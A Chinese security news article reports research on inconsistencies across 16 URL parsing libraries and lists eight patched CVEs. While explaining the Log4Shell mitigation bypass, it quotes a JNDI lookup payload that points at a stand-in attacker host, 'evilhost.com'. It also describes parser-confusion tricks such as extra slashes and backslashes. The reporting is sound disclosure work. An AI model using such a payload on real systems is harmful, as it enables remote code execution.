研究人员在广泛使用的 URL 解析器库中发现漏洞

发布时间 - 2022-01-14 15:54:41    点击率:254次

日前,有研究人员对 16 个不同的统一资源定位符( URL )解析库进行调研后,发现了不一致和混乱的情形,它们可以被不法分子用来绕过验证机制,为众多攻击途径敞开大门。随后,两家网络安全公司 Claroty 和 Synk 联合开展了深入的分析工作,结果发现,用C 、JavaScript 、 PHP 、 Python 和 Ruby 等语言编写的许多第三方库存在 8 个安全漏洞,多个 Web 应用程序使用这些第三方库。

发现的8个漏洞包括Belledonne’s SIP Stack(C,CVE-2021-33056)、Video.js(JavaScript,CVE-2021-23414)、Nagios XI(PHP,CVE-2021-37352)、Flask-security(Python,CVE-2021-23385)、Flask-security-too(Python,CVE-2021-32618)、Flask-unchained(Python,CVE-2021-23393)、Flask-User(Python,CVE-2021-23401)、Clearance(Ruby,CVE-2021-23435),所有这些漏洞此后已由各自的维护人员修复。

研究人员表示:“ URL 解析中的混乱可能导致软件(比如 Web 应用程序)出现异常行为,可能被威胁分子用来引发拒绝服务攻击、泄露信息,或可能实施远程代码执行攻击。”由于 URL 是一种用来请求和检索位于本地或 Web 上资源的基本机制,解析库如何解释 URL 请求方面的差异可能会给用户带来重大风险。一个典型例子是 2021 年 12 月在 Log4j 日志框架中暴露的 Log4Shell 严重漏洞。该漏洞源于攻击者控制的恶意字符串被评估、并由易受攻击的应用程序记录时,导致 JNDI 查询连接到攻击者运行的服务器,从而执行任意 Java 代码。虽然 Apache 软件基金会( ASF )迅速发布了补丁以修复漏洞,但人们很快发现,输入精心设计的内容(格式为“ ${jndi:ldap://127.0.0[.] 1#.evilhost.com:1389/a}”),可以绕过缓解措施,再次允许远程 JNDI 查询执行代码。

研究人员表示:“这种绕过源于在 JNDI 查询过程中使用了两个不同的 URL 解析器,一个解析器用于验证 URL ,另一个用于获取 URL ;URL 的 Authority 部分也发生变化,这取决于每个解析器如何处理 URL 的 Fragment 部分(#)。” 具体来说,如果输入作为常规的 HTTP URL 来处理, Authority 部分(域名和端口号的组合)一遇到 fragment 标识符就结束;而作为 LDAP URL 来处理时,解析器会分配整个“127.0.0[.]1#.evilhost.com:1389”作为 Authority ,因为 LDP URL 规范不考虑该 fragment 。

的确,使用多个解析器是这8个漏洞出现的主要原因之一,还有一个原因是,库遵循不同的 URL 规范时存在不一致,从而导致了问题,这实际上带来了可利用的漏洞。不一致的情形多种多样,如 URL 含有反斜杠(“\”)、不规则数量的斜杠(比如https:///www.example[.]com)或 URL 编码数据(“%”), 以及 URL 缺少 URL 方案等,这后一种情形可被用来实施远程代码执行攻击,甚至发动拒绝服务( DoS )和开放重定向网络钓鱼攻击。研究人员表示:“许多实际的攻击场景可能来自不同的解析原语。”为了保护应用程序免受 URL 解析漏洞的影响,“有必要充分了解整个过程中牵涉哪些解析器,以及解析器之间的差异,了解它们如何解释不同格式、有误的 URL 以及它们支持哪些类型的 URL 。”

参考链接:

https://thehackernews.com/2022/01/researchers-find-bugs-in-over-dozen.html

最新文章 第十二版《网络安全企业100强》发布 开源推荐算法为什么并不“可靠”? 虹膜写真风靡年轻人:小心泄露敏感个人信息 国内最大IT社区CSDN被挂马,CDN可能是罪魁祸首? Apache Struts文件上传漏洞 (CVE-2024-53677) 安全风险通告 工信部:关于防范新型勒索病毒Ymir的风险提示 美国报告揭示俄罗斯战略信息攻击:从攻击方法到战略效果 最危险的网络攻击:云勒索软件 个人信息保护合规审计:个人信息删除落地与审计 Forrester:Akamai创新微分段技术引领企业安全升级,实现 152%高ROI Fortinet发布《2025年网络威胁趋势预测报告》 揭秘四大威胁挑战 榜上有名!360入选2024年天津市网络安全应用场景优秀案例 只需一个暗号,即可戳穿语音克隆骗局 写在IDCC2024数字基础设施国际合作大会之前 IETF的运行方式及RFC的形成 《AI时代深度伪造和合成媒体的安全威胁与对策(2024版)》报告发布 UnitedHealth勒索软件攻击事件应吸取的六个备份教训 网络安全产品奥斯卡 2024年度赛可达优秀产品奖(SKD AWARDS) “危“”机“并存,五位网络安全大咖预警2025年安全态势 赋能智算未来,CDCE2024国际数据中心展12月5日上海璀璨开幕 俄罗斯黑客组织渗透和利用巴基斯坦黑客组织服务器案揭秘 国家安全部:警惕开源信息成为泄密源头 “清朗·网络平台算法典型问题治理”专项行动中的排名算法 游戏玩家请注意!Winos4.0木马已“潜伏” 2024 DAMS中国数据智能管理峰会即将在上海举办 WAF气数已尽? 网安巨头Palo Alto全球数千防火墙被攻陷:因开发低级错误造成零日漏洞 数字城市AI安全运营中心签约揭牌,360赋能长三角城市安全新篇章 勒索软件忙招人,2024年网络威胁五大新趋势 360发布全球首份《大模型安全漏洞报告》,曝光近40个大模型相关安全漏洞 值得关注的十二大网络安全风险评估工具及选型指南 俄黑客通过“近邻攻击”远程入侵美国企业WiFi网络 四校签约、六家授牌!360与河南高校再摘网络安全人才培育新果实 Apple多个在野高危漏洞在野利用通告 苹果官方警告:零日漏洞攻击瞄准Mac电脑用户 《密码法》颁布五周年:法治成效、实施难点与未来走向 27天!揭秘身份管理中凭证修复为何如此艰难? 微软“清理门户”,禁止杀毒软件访问Windows内核 云原生环境下的七大网络安全威胁及应对建议 ​透析恶意软件“四大家族”
在线客服
联系方式

热线电话

18556842815

上班时间

周一到周五

公司电话

027-85365976

二维码
线